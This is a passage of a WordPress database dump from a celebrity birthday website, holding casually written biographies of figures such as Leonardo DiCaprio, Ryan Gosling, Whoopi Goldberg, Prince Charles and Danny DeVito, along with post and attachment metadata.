teens.\r\n\r\nDiCaprio\'s acting career so a rocky start. In the early 1990s though he was able to become a regular on a television network. He had a few guest appearances on a few TV shows like <em>The New Lassie</em> and <em>Roseanne</em>. He even had a role on a comedy called <em>Parenthood</em>, but the show did not last for long.\r\n<h3>Career Accomplishments</h3>\r\nDiCaprio didn\'t see his first major film role until he starred in the film <em>The Boy\'s Life</em> in 1993. In 1997, he starred in <a href=\"https://en.wikipedia.org/wiki/Titanic_(1997_film)\" target=\"_blank\">Titanic</a> which became a sensational it. It was that role which skyrocketed him to being the big star he is today. He\'s worked alongside other talented film people such as Clint Eastwood and Martin Scorsese.\r\n\r\nIn October of 1997, The Empire, a UK magazine, listed him as No. 75 on “The Top 100 Movie Stars of All Time” List. People magazine even called DiCaprio one of the “50 Most Beautiful People in the World.” He has even received a Oscar nomination for his portrayal of Howard Hughes in the 2004 film <em>The Aviator</em>.\r\n<h3>Most Known For</h3>\r\nDiCaprio is well known for taking on odd roles and making them shine. Perhaps his best known performance (and no doubt a fan favorite still) is his role in the film Titanic. Recently, he\'s starred in another popular film made in 2013 called <em>The Wolf of Wall Street</em>. Another film he starred in was <em>The Great Gatsby</em> released in 2013. where he played the role of Jay Gatsby.\r\n<h3>Current Personal Life</h3>\r\nDiCaprio\'s personal life and his public life do not have much of a separation. He did have an off again and on again relationship with <a href=\"https://en.wikipedia.org/wiki/Gisele_B%C3%BCndchen\" target=\"_blank\">Gisele Bundchen</a> who was a supermodel. From 2000 to 2005 the rocky relationship served as gossip fodder for Web sites and several celebrity magazines. He did date another model, <a href=\"http://www.barrefaeliofficial.com/\" target=\"_blank\">Bar Refaeli</a>, for a couple of years. In 2011, he hooked up with an actress named Blake Lively. Ever since he\'s dated other models too.\r\n<h3>Where Are They Now</h3>\r\nDiCaprio has continued to be a talented actor, but he also has a passion for the environment as well. In 2000 he even hosted a <a href=\"http://simplyleonardodicaprio.com/leonardo/causes/emails/earth-day\" target=\"_blank\">Earth Day celebration</a>. Even serving on the boards of the International Fund for Animal Welfare, World Wildlife Fund, and Natural Resources Defense Council. He even released a documentary in 2007 that he wrote, narrated, and debuted himself. He\'s the one of a few founders of <a href=\"http://leonardodicaprio.org/\" target=\"_blank\">The Leonardo DiCaprio Fund</a> at California Community Foundation. It\'s a non-profit organization which supports environmental causes and awareness. He even has a partnership with Netflix to produce documentaries that focus on conservation and environmental issues.\r\n\r\n \r\n\r\n ','Leo DiCaprio (1974 – Present)','','publish','open','open','','leo-dicaprio','','','2016-11-28 19:27:19','2016-11-28 19:27:19','',0,'http://birthdaypedia.com/?p=534',0,'post','',0),(535,2,'2015-11-12 09:20:23','2015-11-12 09:20:23','Ryan Gosling is a talented Canadian actor. Some of his best work are the roles he took on for films like <em>Crazy, Stupid, Love</em>, <em>The Notebook</em>, and <em>Half Nelson</em>. He\'s even had nominations for the Golden Globe and the Academy Award.\r\n<h3>In the Beginning</h3>\r\nRyan was born on November 12, 1980 in <a href=\"https://www.london.ca/Pages/Default.aspx\" target=\"_blank\">London, Ontario</a>. His parents were Thomas Ray Gosling, who worked as a traveling salesman. His mother, Donna Gosling, worked as a secretary. At one point his family moved to Cornwall, Ontario. He grew up there and was home schooled by his mother.\r\n\r\nRyan enrolled in Cornwall Collegiate and Vocational High School in Cornwall. He did well in Drama and Fine Arts. His family moved once again to Burlington, Ontario. Ryan enrolled in Lester. B. Pearson High School once they moved there.\r\n\r\nRyan didn\'t perform until he did a talent contest with his sister Mandi as a singer. He also attended an open audition in Montreal for the TV series “The Mickey Mouse Club”. In January of 1993 he was picked out of 17,000 people to have a spot on the show. During the time he was on the show for two years, he lived with Justin Timberlake\'s family.\r\n\r\nRyan did not have any formal training prior to starring on “The Mickey Mouse Club”. However, that did not stop him from pursing his acting career. He even appeared on the show <em>Young Hercules</em> in 1998.\r\n<h3>Career Accomplishments</h3>\r\nRyan Gosling has had a humble, but successful acting career. When played a role in the film <em><a href=\"https://en.wikipedia.org/wiki/Half_Nelson_(film)\" target=\"_blank\">Half Nelson</a></em>, he was nominated for an Academy Award. He received a Golden Globe nomination for the role he played in <em>Lars and the Real Girl</em> too. In 2004, People magazine named Ryan as “<a href=\"http://www.eonline.com/news/ryan_gosling\" target=\"_blank\">50 Hottest Bachelors</a>”. That same year he was named the 2004 Sho West Male Star of Tomorrow.\r\n<h3>Most Known For</h3>\r\nRyan Gosling is well known for some of his earlier roles. <a href=\"http://www.rogerebert.com/reviews/the-notebook-2004\" target=\"_blank\">The Notebook</a>, a film that came out in 2004, was a romantic hit. Long time fans of his may even still recognize him for his role in <em>The Mickey Mouse Club</em> he played. Along with recent films like <em>Blue Valentine</em> in 2010 and <em>Crazy, Stupid, Love</em> that same year.\r\n<h3>Current Personal Life</h3>\r\nGosling has been working promoting a number of social causes. These include humane treatment of animals, AIDS research, and poverty release. He even enjoys boxing and making furniture too. He picked up the skill when he made a table for the film <em>The Notebook</em>. He\'s a skilled <a href=\"http://perezhilton.com/2010-09-07-play-that-guitar-ryan-gosling#.VkDLO_krK70\" target=\"_blank\">singer and jazz guitarist</a> as well to boot.\r\n\r\nThroughout the years he\'s been linked romantically to co-stars. A few of them are Rachel McAdams and Sandra Bullock. In 2011, he started a relationship with <a href=\"https://en.wikipedia.org/wiki/Eva_Mendes\" target=\"_blank\">Eva Mendes</a>. In 2014, they announced their first child. They had a daughter born in September they named Esmeralda Amada.\r\n<h3>Where Are They Now</h3>\r\nRyan\'s career as an actor has continued to do well. Seeking to be better, he has challenged himself as an actor as well. He starred in the crime drama <em>The Place Beyond the Pines</em> which saw its debut at the 2012 Toronto International Film Festival. He starred in the film Gangster Squad too, but the movie didn\'t see its debut until January 2013 due to a scene where a shootout takes place at a movie theater.\r\n\r\nWhile he continues to work on improving his talent as an actor. He\'s been working on a directorial debut called <em>How to Catch a Monster</em>. He wrote and produced the film himself. The film is evening starring Christina Hendricks too.\r\n\r\n \r\n\r\n ','Ryan Gosling (1980 – Present)','','draft','open','open','','ryan-gosling','','','2015-11-09 17:16:49','2015-11-09 17:16:49','',0,'http://birthdaypedia.com/?p=535',0,'post','',0),(537,2,'2015-11-09 16:59:04','2015-11-09 16:59:04','','Evander Holyfield birthday','','inherit','open','closed','','evander-holyfield','','','2015-11-09 16:59:16','2015-11-09 16:59:16','',421,'http://birthdaypedia.com/wp-content/uploads/2015/10/Evander-Holyfield.jpg',0,'attachment','image/jpeg',0),(540,2,'2016-11-13 07:18:37','2016-11-13 07:18:37',' \r\n\r\nWhoopi Goldberg is a humans rights advocate and the television host for the longstanding talk show <em>The View</em>. She\'s a talented actress and comedian all rolled up in one. She\'s won Grammy Awards throughout her career too.\r\n<h3>In the Beginning</h3>\r\nWhoopi Goldberg was born on November 13, 1955 in <a href=\"https://en.wikipedia.org/wiki/New_York_City\" target=\"_blank\">New York City</a>. She had a younger brother named Clyde. Their mother, Emma, raised them both in the Chelsea section of Manhattan. They lived in a housing project.\r\n\r\nWhoopi\'s father left the family to their own devices early on. Her mother worked several jobs including nursing and teaching in order to provide for her children. Whoopi changed her named when she made the decision the name she was born with was to boring.\r\n\r\nAt one point she had to drop of high school. She did not know it at the time, but she had <a href=\"http://www.ninds.nih.gov/disorders/dyslexia/dyslexia.htm\" target=\"_blank\">dyslexia</a>. This made it difficult for her to study and is why she eventually dropped out when she was only seventeen years old.\r\n\r\nIn 1974, Whoopi moved to California. She lived in various places in California for seven years including Los Angels, San Diego, and San Francisco. At one point she even worked as a mortuary beautician while she pursued her career in show business. While she was residing in San Franciso, she was able to win a Bay Area Theatre Award due to her portrayal of Moms Mabley.\r\n\r\nShe moved back to New York in 1983. Getting another break in her career when she starred in <em>The Spook Show</em>. Using her own comedy material at the time which addressed the <a href=\"http://www.huffingtonpost.com/news/racism-in-america/\" target=\"_blank\">racial issues in America</a> using wit, style, and profundity.\r\n<h3>Career Accomplishments</h3>\r\nWhoopi Goldberg won a Grammy Award in 1985 for her role in a popular play in 1983. She saw a lot of success after he role in the film <em>The Color Purple</em> in 1985. In the 1990s she was the highest paid actress at the time. She\'s won the top honors for a person in her profession. Along with an Oscar and a Mark Twain Award for American Humor. There are millions of Americans who tune into her TV program called <em>The View</em> as well.\r\n<h3>Most Known For</h3>\r\nWhoopi Goldberg has appeared in more than 80 TV productions and films throughout her career. Perhaps her best well known and celebrated performance is the one she did for <em><a href=\"https://en.wikipedia.org/wiki/The_Color_Purple_(film)\" target=\"_blank\">The Color Purple</a></em>. Her television series, <em>The View</em>, is also widely popular as well. Millions of Americans are known to tune in to see the show each day.\r\n<h3>Current Personal Life</h3>\r\nWhoopi was married for a while in the early 1970s to a man who had previously been her drug counselor. They had one child named Alexandrea, but divorced in 1974. In 1986, she marred a the camera man David Claessan. In 1988 the two split up. In the early 1990s, Whoopi did have a high profile romance going on with the actor Ted Danson.\r\n\r\nWhoopi did go on to earn a Ph. D. in literature from New York University. She received an honorary degree too from Wilson College located in Chambersburg, Pennsylvania.\r\n<h3>Where Are They Now</h3>\r\nWhoopi has continued to pursue other creative endeavors after her time on <em>The View</em>. She was the director the documentary released in 2013 called <em>Whoopi Goldberg Presents Moms Mabley</em>. The film explores her career life of being one of the first successful African-American women to be in stand-up comedy.\r\n\r\nWhoopi\'s career is long and varied. She\'s made a dent in the industry, and has set a strong example for overcoming obstacles early in life for other women.\r\n\r\n \r\n\r\n ','Whoopi Goldberg (1955 – Present)','','publish','open','open','','whoopi-goldberg','','','2016-11-28 19:13:09','2016-11-28 19:13:09','',0,'http://birthdaypedia.com/?p=540',0,'post','',0),(541,2,'2015-11-09 17:52:38','2015-11-09 17:52:38','','snoop dogg birthday','','inherit','open','closed','','snoop-dogg-birthday','','','2015-11-09 17:52:43','2015-11-09 17:52:43','',503,'http://birthdaypedia.com/wp-content/uploads/2015/10/snoop-dogg-birthday.jpg',0,'attachment','image/jpeg',0),(543,2,'2015-11-09 18:50:05','2015-11-09 18:50:05','','kim kardashian birthday','','inherit','open','closed','','kim-kardashian-birthday','','','2015-11-09 18:50:16','2015-11-09 18:50:16','',505,'http://birthdaypedia.com/wp-content/uploads/2015/10/kim-kardashian-birthday.jpg',0,'attachment','image/jpeg',0),(545,2,'2016-11-14 07:27:30','2016-11-14 07:27:30','Prince Charles is the oldest son of Prince Philip and <a href=\"https://en.wikipedia.org/wiki/Elizabeth_II\" target=\"_blank\">Queen Elizabeth II</a>. He\'s the heir to the British throne. For most of his life he\'s been under public scrutiny for the relationships he\'s had with various women over the years. Even admitting to adultery while he was married to Princess Diana.\r\n<h3>In the Beginning</h3>\r\nPrince Charles was born on November 14, 1948 in London, England. He\'s the son of Prince Philip and Queen Elizabeth II. Prince Charles came to the royal hierarchy at an early age. When he was three years old his mother became queen due to the passing of his grandfather, King George VI. Being her oldest child, Charles became the next heir for the British throne. He even received the title of <a href=\"http://duchyofcornwall.org/the-duke-of-cornwall.html\" target=\"_blank\">Duke of Cornwall</a>.\r\n\r\nCharles attended Hill House School in West London in 1956. The following year he went to boarding school at Cheam School. Along with the responsibilities of his school work, he became the Prince of Wales when he was only nine years old. He changed schools in 1962 to attend Gordonstoun in Scotland. From there he studied in Australia too.\r\n\r\nCharles was a good student and studied history, archaeology, and anthropology at Trinity College. He was involved in campus life as well. Participating in several activities including the polo team. He earned his degree in 1970 and started hi military career soon after.\r\n<h3>Career Accomplishments</h3>\r\nCharles joined the <a href=\"http://www.royalnavy.mod.uk/\" target=\"_blank\">Royal Navy</a> in 1971. He commanded a ship and even served as a helicopter pilot too. He left the military in 1976, and in the same year established a charitable organization called The Prince\'s Trust.\r\n<h3>Most Known For</h3>\r\nCharles saw a large interest in the media perk up when he started his realtionship with <a href=\"http://www.royal.gov.uk/HistoryoftheMonarchy/The%20House%20of%20Windsor%20from%201952/DianaPrincessofWales/Childhood.aspx\" target=\"_blank\">Lady Diana Spencer</a>. They had known each other previously when they were younger, but met again in the 1970s. The two soon became engaged in February of 1981. The public adored his fiancee immensely. The two eventually married on July 29, 1981. The ceremony was broadcast around the world. With millions of people tuning in that day to see the marriage ceremony.\r\n\r\nDespite the birth of their two children, Prince William Arthur Philip Louis and Henry “Harry” Charles Albert David, not everything was going to have a fairy tale ending for the couple. Over time Charles\' marriage to Diana became strained due to infidelities, royal responsibilities, and media pressure. At one point Charles started a relationship with Camilla Parker Bowles during the time he was still married to Diana. They separated in 1992, but didn\'t divorce until 1996.\r\n<h3>Current Personal Life</h3>\r\nDiana died in a car crash in August of 1997. Charles stepped forward and accompanied her body back to England. During the time his sons were mourning the loss of their mother. Charles asked the media to live them alone. He did maintain his relationship with Camilla, and married her on April 9, 2005. She soon became the Duchess of Cornwall.\r\n\r\nAlong with his royal duties, Charles has defined himself as a philanthropist as well. Along with The Prince\'s Trust, he has also founded several more charitable organizations too.\r\n<h3>Where Are They Now</h3>\r\nIn 2013, Charles became a grandfather for the first time with the birth of Prince William\'s son, George Alexander Louis, on July 22. After the birth of his grandson, Charles made a statement to the public:\r\n\r\n<em>“Both my wife and I are overjoyed at the arrival of my first grandchild. It is an incredibly special moment for William and Catherine, and we are so thrilled for them on the birth of their baby boy.”</em>\r\n\r\n ','Prince Charles (1948 – Present)','','publish','open','open','','prince-charles','','','2016-11-28 19:10:40','2016-11-28 19:10:40','',0,'http://birthdaypedia.com/?p=545',0,'post','',0),(546,2,'2016-11-15 07:47:52','2016-11-15 07:47:52','Lily Aldrige is a beautiful American model. She\'s a <a href=\"https://www.victoriassecret.com/vsallaccess/angels\" target=\"_blank\">Victoria\'s Secret Angel</a> and has even appeared on the cover of <em>Sports Illustrated Swimsuit Issue</em> for the 50<sup>th</sup> anniversary. She started modeling at a young age, but has been successful in her career ever since.\r\n<h3>In the Beginning</h3>\r\nLily was born on November 15, 1985 in <a href=\"http://lacity.org/\" target=\"_blank\">Los Angeles, California</a>. Right from the start it seems Lily was destined to pursue a career in fashion. She comes from a fashion background herself. Her father is the English artist Alan Aldridge, and her mother is Laura Lyons who is a former Playboy playmate. Her half broth works as a fashion photographer while her half sister and sister have each worked as models before.\r\n\r\nFrom a young age, Lily enjoyed dressing up. She loved to play with clothes, and a huge influence for her was Mia Hanm at the time. In her younger years she was into soccer. Even wearing jersey shorts for the better part of her childhood. When she began to attend middle school she was into surfer fashion for a time.\r\n\r\nIt was not until high school Lily began to show an interest in fashion. She had to attend a Catholic school and wear a uniform. As Lily explains it from Vogue Page:\r\n\r\n<em>“I had to wear a uniform to school, so it was all about the shoes. That is how you identified yourself when you went to a Catholic school, by your shoes! I kind of liked the Adidas shell-toe sneakers. I was into rock ’n’ roll so I would also wear Dr. Martens, and cut-off jeans with a simple T-shirt.”</em>\r\n\r\nLily didn\'t start her modeling career however until she began to do ads for Abercrombie & Fitch. She has even done a few campaigns for Levi\'s, Bobbi Brown, Gap, and many others.\r\n<h3>Career Accomplishments</h3>\r\nLily Aldridge has continued to step up in her career. She did guest star on a television series called <em>2 Broke Girls</em>, starring as herself. In 2015, she even became the face of <a href=\"http://www.teenvogue.com/gallery/lily-aldridge-velvet\" target=\"_blank\">Velvet Teens</a> for the designer of the clothing line Velvet done by Graham & Spencer.\r\n<h3>Most Known For</h3>\r\nLily is well known for being Victoria\'s Secret Angel. In 2009, she did her first walk for the Victoria\'s Secret Fashion Show. The following year she became a Victoria\'s Secret Angel. She did received her “wings” during the second show she did.\r\n<h3>Current Personal Life</h3>\r\nEventually, Lily did meet the musician <a href=\"http://www.usmagazine.com/celebrity-news/news/lily-aldridge-reveals-how-caleb-followill-makes-her-feel-loved-on-valentines-day-2013142\" target=\"_blank\">Caleb Followill</a> from the and called Kings of Leon. The two met in 2007, and dated for a few years. They married in May 2011, and had their daughter Dixie Pearl a while later.\r\n<h3>Where Are They Now</h3>\r\nLily Aldrige has continued to pursue her career as a model. She did guest star on a television series called <em>2 Broke Girls</em>, starring as herself. In 2015, she has become the face of Velvet Tees. The designer clothing line that comes from Velvet by Graham & Spencer.\r\n\r\nAs she continues to pursue her career. Lily has shown a natural talent for what she does as a model. She had a natural inclination to the <a href=\"http://www.usfashionindustry.com/about-us/about-the-fashion-industry\" target=\"_blank\">fashion industry</a> as a child, and that passion has only grown through the years. She\'s far from done too. Despite having a daughter she\'s still very confident about not only her body, but herself as a person too. If Lily continues to pursue the career at the rate she\'s going now. She will no doubt be able to establish herself as one of the top models in the industry. She has a lot of potential to grow and learn in her career.\r\n\r\n \r\n\r\n ','Lily Aldridge (1985 – Present)','','publish','open','open','','lily-aldridge','','','2016-11-28 16:59:32','2016-11-28 16:59:32','',0,'http://birthdaypedia.com/?p=546',0,'post','',0),(547,2,'2016-11-16 18:00:25','2016-11-16 18:00:25','Lisa Bonet is a successful actress who first got her start on “The Cosby Show”. Sh starred in the television series as a child, but did not get her chance in show business until she had been involved in beauty pageants as a child.\r\n<h3>In the Beginning</h3>\r\nLisa Bonet was born on November 16, 1967 in <a href=\"http://sfgov.org/\" target=\"_blank\">San Francisco, California</a>. Her father was Allen Bonet who was an opera singer, and her mother Arlene Joyce who worked as a teacher. She lived in Los Angeles and New York for the majority of her childhood. She did attend Reseda High School and even Celluloid Actor\'s Studio.\r\n\r\nWhile she was still young her parents got divorced. At this point is when her acting career began to pick up. When she was eleven she began to act in a couple of commercials. When she was sixteen she was able to land the role of Denise Huxtable for the comedy series <em><a href=\"http://www.avclub.com/article/how-emthe-cosby-showem-spoke-to-race-and-class-in--87848\" target=\"_blank\">The Cosby Show</a></em> in 1984. It was her stint on the show which helped her to become a highly popular actress.\r\n\r\nLisa Bonet eventually left the show and starred in its spin off series called <em>A Different World</em>. The series was about the college life of Denise Huxtable. The same year she was able to get the role for Epiphany Proud in the movie Angel Heart.\r\n<h3>Career Accomplishments</h3>\r\nLisa Bonet started her career early in life when got her role on <em>The Cosby Show</em>. She became so popular that she even starred in its spin off series called <em>A Different World</em>. The same year the series started, she was able to get a role in the movie Angel Heart. Soon after, she went back to <em>A Different World</em>. During the course of the series she became pregnant, and was fired from the show in 1991.\r\n<h3>Most Known For</h3>\r\nLisa Bonet is still recognized for her time on <em>The Cosby Show</em>. However, she\'s recognized in other films as well. She appeared in the movie <em>Enemy of the State</em> in 1998 that starred <a href=\"http://www.biography.com/people/will-smith-9542165\" target=\"_blank\">Will Smith</a>. She had another role as well in the film <em>High Fidelity</em> in 2000. However, many fans may still recognize her from the time she did the spin off series <em>A Different World</em>.\r\n<h3>Current Personal Life</h3>\r\nLisa eloped with <a href=\"http://birthdaypedia.com/lenny-kravitz/\" target=\"_blank\">Lenny Kravitz</a> in Las Vegas, Nevada on November 16, 1987. The two had a daughter born a year later on December 1, 1988. Things were not meant to go well for the couple however. The two broke up and got a divorce in 1992. At the time of the breakup Lisa\'s fame had begun to fade as well.\r\n\r\nShe did date Bryan Kest in 1992 and even changed her named to Lilakoi Moon in 2005. She broke up with Bryan though and began to date Jason Momoa later that same year. The two were married in 2007. The two had two children together named Jason and Lola.\r\n<h3>Where Are They Now</h3>\r\nLisa Bonnet\'s career has begun to see a bit of an upheaval at the moment. She did choose to step away from acting for a time in order to focus on her family. However, she did make a return in the movie<em> Enemy of the State</em> in 1998. In 2000 she managed to land an important role in the film <em>High Fidelity</em>. Yet again in 2006 she co-starred in the film called <em>Whitepaddy</em>. Even appearing in the American adaption of the British TV series that is called <em>Life on Mars</em>.\r\n\r\nWhile Lisa Bonnet\'s career may not be the most glamorous one. She has still continued to pursue it, and is starting to make a comeback to reclaim her fame.\r\n\r\n ','Lisa Bonet (1967 – Present)','','publish','open','open','','lisa-bonet','','','2016-11-28 16:56:23','2016-11-28 16:56:23','',0,'http://birthdaypedia.com/?p=547',0,'post','',0),(548,2,'2016-11-17 09:17:11','2016-11-17 09:17:11','Danny Devito is the famous American actor and filmmaker with an extensive career. He got his start on the road to fame when he first starred on the TV show Taxi. Many people may recognize him for starring in a popular comedy show It\'s Always Sunny in Philadelphia.\r\n<h3>In the Beginning</h3>\r\nDanny Devito (real name Daniel Michael DeVito Jr.) was born on November 17, 1944 in <a href=\"https://en.wikipedia.org/wiki/Neptune,_New_Jersey\" target=\"_blank\">Neptune, New Jersey</a>. He was raised by his father, Danny Sr. and his mother Julia. His father worked as a small business owner who took on different ventures like a pool hall, dry cleaners, dairy outlet, and luncheonette. Danny Devito attended the Our Lady of Mount Carmel Grammar School. He also attended the Oratory Prep High School in Summit, New Jersey. It was here he started to give acting a try. Starring in a couple of school productions such as the <em>Billion Dollar Saint</em> and <em>St. Francis of Assisi</em>.\r\n\r\nDanny Devito is only five feet tall, but when he was younger he wished to be taller. As he puts it:\r\n\r\n<em>“I was plagued; I couldn\'t slow-dance with the girls I wanted to because my face would be in a spot where I might be thought of as moving too fast.” </em>\r\n\r\nHis height made him a prime target for bullies as well, but he often had friends who would back him up.\r\n\r\nEven though he acted in high school and graduated in 1962. He did not consider acting as the right career path for him. He was not interested in going to college either. His sister was the one who mentioned he work as a <a href=\"http://entertainment.ie/celebrity-gossip/showbiz/I-was-a-hairdresser-for-corpses-reveals-Danny-Devito/50635.htm\" target=\"_blank\">hairdresser</a> for the salon she owned.\r\n\r\nHe worked for 18 months at the salon before he decided to go into cosmetics. He applied for makeup classes at the <a href=\"https://www.aada.edu/\" target=\"_blank\">American Academy of Dramatic Arts</a> in New York. Applicants had to perform a monologue in order to get into the school\'s programs. He received positive feedback for his monologue, and decided to take up acting classes too.\r\n\r\nDevito graduated from the American Academy in 1966. He did not land a film role at first though. He was able to land a few parts in off Broadway parts at first. His big break came when he scored the role of Martini in the off Broadway production based off of Ken Kesey\'s classic novel, <em>One Flew Over the Cuckoo\'s Nest</em>.\r\n<h3>Career Accomplishments</h3>\r\nOne Flew Over the Cuckoo\'s Nest received five Academy Awards in 1976, and brought Danny Devito into the spotlight. He auditioned for the NBC series <em>Taxi</em> in 1978. The show was on the air for five years, and won him an Emmy Award for Best Supporting Actor in 1981. He starred in several other hit productions like the film <em>Terms of Endearment</em> in 1983. He played The Penguin in <em>Batman Returns</em> in 1992 too.\r\n<h3>Most Known For</h3>\r\nDanny Devito has starred in many major films. He starred in a 1988 comedy <em>Twins</em> with <a href=\"http://birthdaypedia.com/arnold-schwarzenegger/\">Arnold Schwarzenegger</a>. In 2005, he saw a major return to television in 2005 when he starred in the FX series called <em>It\'s Always Sunny in Philadelphia</em>. A few recent films he\'s starred in is <em>Solitary Man</em> in 2009 and <em>When in Rome</em> in 2010.\r\n<h3>Current Personal Life</h3>\r\nWhen he was still acting in a 1970 off Broadway production of <em>The Shrinking Bride</em>. He met <a href=\"https://en.wikipedia.org/wiki/Rhea_Perlman\" target=\"_blank\">Rhea Perlman</a> at the time. Two weeks after they had met, the two moved in together. They married in 1982 and had three children. In October 2012, the two announced they were splitting up. In 2013 however, they reunited after a few months.\r\n<h3>Where Are They Now</h3>\r\nDanny Devito has not only been an excellent actor, but a producer and director as well. His debut as a director was with a dark comedy called <em>Throw Momma from the Train</em>. He\'s directed a few other films as well. Even producing some good films like <em>Pulp Fiction</em> in 1994 and <em>Be Cool</em> in 2005. He has over three decades of being in the movie industry, and he sums up pretty well:\r\n\r\n<em> “Hollywood is a jungle. It\'s full of quicksand, vermin and flesh-eating beasts. Making a movie is not a walk in the park. Every movie is like navigating treacherous terrain. Fighting a battle and winning is fun. And this business is fun. I love it. It\'s the greatest business in the world.”</em>\r\n\r\n ','Danny Devito (1944 – Present)','','publish','open','open','','danny-devito','','','2016-11-28 16:44:50','2016-11-28 16:44:50','',0,'http://birthdaypedia.com/?p=548',0,'post','',0),(549,2,'2016-11-18 08:17:12','2016-11-18 08:17:12','Owen Wilson is a film actor who is known for starring in quirky films. He has a subtle humor that has seemed to only improve over the years. He\'s good at what he does, and he enjoys doing it too.\r\n<h3>In the Beginning</h3>\r\nOwen Wilson was born on November 18, 1968 in <a href=\"http://dallascityhall.com/Pages/default.aspx\" target=\"_blank\">Dallas, Texas</a>. He\'s the son of a advertising executive and a photographer. Early on he was a bit of a comedian. He even grew up beside two other actors as well.\r\n\r\nHe was expelled from St. Mark\'s School of Texas. Owen did graduate from Thomas Jefferson School before he went on to attend New Mexico Military Institute. He enrolled in the University of Texas Austin. While attending he met the future filmmaker <a href=\"https://en.wikipedia.org/wiki/Wes_Anderson\" target=\"_blank\">Wes Anderson</a>. Together, the two made a feature film together in 1996 called Bottle Rocket. The film was originally created to show at the Sundance Film Festival.\r\n<h3>Career Accomplishments</h3>\r\nOwn and Wes went on to make several more films together. These include <em>The Royal Tenebaums</em>, <em>Rushmore</em>, and <em>The Life Aquatic</em>. He\'s even participated in a few classic films as well such as <em>Cars</em> and <em>Cars 2</em>. Other comedic films he\'s starred in are <em>Meet the Parents</em> in 2000, <em>Zoolander</em> in 2001, <em>Starsky & Hutch</em> in 2004, and even the box office hit in 2005 <em>Wedding Crashers</em>.\r\n<h3>Most Known For</h3>\r\nOwen is known for some of his more recent work. He played a high acclaimed role in the 2009 film <em><a href=\"http://www.theguardian.com/film/2009/oct/25/fantastic-mr-fox-review\" target=\"_blank\">The Fantastic Mr. Fox</a></em>. Along with <em>Free Birds</em> in 2013, <em>Midnight in Paris</em> in 2011, and Inherent Vice in 2014. Owen even tried doing an action thriller in 2015 called <em>No Escape</em>.\r\n<h3>Current Personal Life</h3>\r\nOwen had to be taken to the hospital from his home in Santa Monica, California on August 26, 2007. There was a police report later about how they had to respond due to a <a href=\"http://www.people.com/people/archive/article/0,,20060242,00.html\" target=\"_blank\">suicide attempt</a> Owen had made. Owen did release a statement asking people to give him privacy so he could “receive care and heal in private during this difficult time.” Friends and family visited him while he was staying in the hospital. In less than a week Owen Wilson returned home.\r\n\r\nOwen, perhaps still healing during this difficult time in his life, did cancel a few appearances. He also dropped out the film <em>Tropic Thunder </em>that came out in 2008.\r\n<h3>Where Are They Now</h3>\r\nOwen has been able to make a comeback of sorts. He has starred in a few films in recent years. <em>Cars</em> and <em>Cars 2</em>. Even <em>Marmaduke</em> in 2010 and <em>Free Bird</em>s in 2013. The most recent film he starred in was the film <em>No Escape</em> that came out in 2015. It\'s not known yet what other films Owen Wilson may be starring in the future. However, with the most recent release. It could mean he\'s decided to try his hand and other film genres rather than the quirky films and comedies he\'s so well known for. If so, it could produce some interesting results.\r\n\r\nOwen Wilson may have not won any awards as an actor. The films he\'s starred on are either well known, or they were buried after a few years. Even though he has had a setback due to some personal issues. He\'s continued to pursue his career as an actor. He\'s hardly at the end of his career. If anything, perhaps with <em>No Escape</em> he can define a new era in his life. He may be able to show he is talented enough to take on more serious roles as well. Only time will tell if he is able to pull this off.\r\n\r\n \r\n\r\n ','Owen Wilson (1968 – Present)','','publish','open','open','','owen-wilson','','','2016-11-28 16:11:52','2016-11-28 16:11:52','',0,'http://birthdaypedia.com/?p=549',0,'post','',0),(550,2,'2016-11-19 08:29:25','2016-11-19 08:29:25','Calvin Klein is a popular brand of women\'s wear and men\'s wear many people have come to associate with high quality clothes. What many people may not know is that there is a man responsible for the excellent line of clothes. Not to mention he even designs cosmetics, home collections, and fragrances.\r\n<h3>In the Beginning</h3>\r\nCalvin Klein was born on November 19, 1942 in <a href=\"https://en.wikipedia.org/wiki/The_Bronx\" target=\"_blank\">Bronx, New York</a>. He spent most of his childhood there, and was the second out of three children. His parents were Leo and Flo Stern. His family could afford to live a comfortable life and wanted for nothing. His grandmother had an influence over him, and helped him to develop a love for sewing. His mother in turn encouraged his passion for fashion and art.\r\n\r\nThis led Calvin to attend the High School of Art and Design. The school was focused around preparing its students for a career of drafting and advertising. As a young boy, Calvin enjoyed sewing, was always studying, and sketching fashion designs. His passion led him to the <a href=\"http://www.fitnyc.edu/\" target=\"_blank\">Fashion Institute of Technology</a> where he graduated in 1962.\r\n\r\nHe began his career in the fashion industry as an apprentice in a suit and coat house in the Seventh Avenue in New York City. He spent long night, and often weekend just perfecting his designs. It was not until 1968 that him and his close friend, Barry Schwartz, created the Calvin Klein coat business. In a twist of fate, their first order came to them completely by accident. A coat buyer who worked for Bonwit Teller had accidentally stepped onto the wrong floor of the hotel. He wandered into the workroom Klein was in. She placed a massive order $50 thousand. Klein received favorable reviews and found support from store executives. Soon expanding his line of clothes to women\'s sportswear too.\r\n<h3>Career Accomplishments</h3>\r\nCalvin Klein has created his own clothesline, but he has also received three <a href=\"https://en.wikipedia.org/wiki/Coty_Award\" target=\"_blank\">Coty Awards</a> for women\'s wear too. His business includes a range of home collections, clothing, cosmetics, and even fragrances.\r\n<h3>Most Known For</h3>\r\nCalvin Klein was originally known for his excellent coats, but over the years he\'s become rather famous for his Calvin Klein collection for women and men. This includes <a href=\"http://explore.calvinklein.com/en_US/explore\" target=\"_blank\">CK jeans</a>, CK sportswear for mean and women, along with countless other apparel as well. Perhaps one of his more famous brands are his line of excellent denim jeans people come to associate the brand with.\r\n<h3>Current Personal Life</h3>\r\nCalvin\'s personal life is not one the media pays great attention too. His personal life has seen difficult at times though. He married a woman named Jayne Centre in 1964. They divorced in 1974 though. They did have one child, whom they named Marci. Later, Calvin married Kelly Rector in 1986, one of his design assistants.\r\n<h3>Where Are They Now</h3>\r\nThe Calvin Klein brand is as strong as ever. The secret to his success being a design philosophy he has that has its roots in minimalism. He tends to use earth tones and neutral colors. Along with designs that can work in different ensembles. These designs can also be work night, day, and season to season. He has received criticism for his advertisements of fragrances and jeans. Still, Calvin Klein has seen success for his modern, clean lines when it comes to his clothes designs.\r\n\r\nHe\'s one of the most successful clothing designers in America today. His popular casual clothing that is simple, but stylish is widely popular among many people. He has continued to be successful in the fashion world, and his brand will no doubt continue to be popular for many years to come.\r\n\r\n ','Calvin Klein (1942 – Present)','','publish','open','open','','calvin-klein','','','2017-06-20 16:08:48','2017-06-20 16:08:48','',0,'http://birthdaypedia.com/?p=550',0,'post','',0),(553,2,'2016-11-20 07:05:45','2016-11-20 07:05:45','Robert Kennedy was the Attorney General at the time of his brother, 